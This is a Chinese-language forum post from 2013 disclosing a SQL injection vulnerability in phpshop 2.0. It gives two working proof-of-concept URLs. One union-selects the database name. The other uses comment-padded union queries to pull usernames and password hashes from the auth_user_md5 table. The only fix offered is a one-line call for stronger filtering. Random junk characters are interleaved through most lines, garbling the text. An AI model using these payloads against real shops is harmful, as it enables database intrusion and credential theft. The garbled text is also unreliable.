标题 : phpshop 2.0 SQL Injection Vulnerability
s, c; m5 S1 p2 O. o" u1 X4 S- e# R0 F k( n# B+ w) `' a
作者 : By onestree
0 N% }% z/ K3 G5 t4 [% t) N2 j" o0 O下载地址 : http://code.google.com/p/phpshop/downloads/list
. I' B1 F$ ]% A+ f& S; S+ M. \测试地址: windows 7 / ubuntu
6 w% }9 P7 S4 x e4 s* N. B% k+ \
& K8 l; z/ g' q5 @8 D
( U. M9 h' W! t& [4 O, k/ oSQLi p0c:: U8 x3 A3 \/ w# W
: X9 q# K$ n4 Q9 o# S7 E5 u==================
, [( `) P/ b9 o+ b
; D0 Y% g, o5 chttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'. t1 I2 x4 o# Q1 J8 P% a
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --) L- n W) K9 ^1 ~; `2 F, p
5 q# [- s/ I; o: z" l3 c6 R2 ahttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
. N6 P9 Q" a3 ?8 U4 F: P
. d/ J" Y ]% L- P7 `修复:9 t1 `8 ^1 f3 |& _
加强过滤/ Q5 n" m* p2 C4 V; l. u
( a5 z+ \! R( Y7 w% R8 A+ z+ C& W/ l1 M; k& R" B) w9 l
|
发表于 2013-1-18 18:24:10
收藏
支持
反对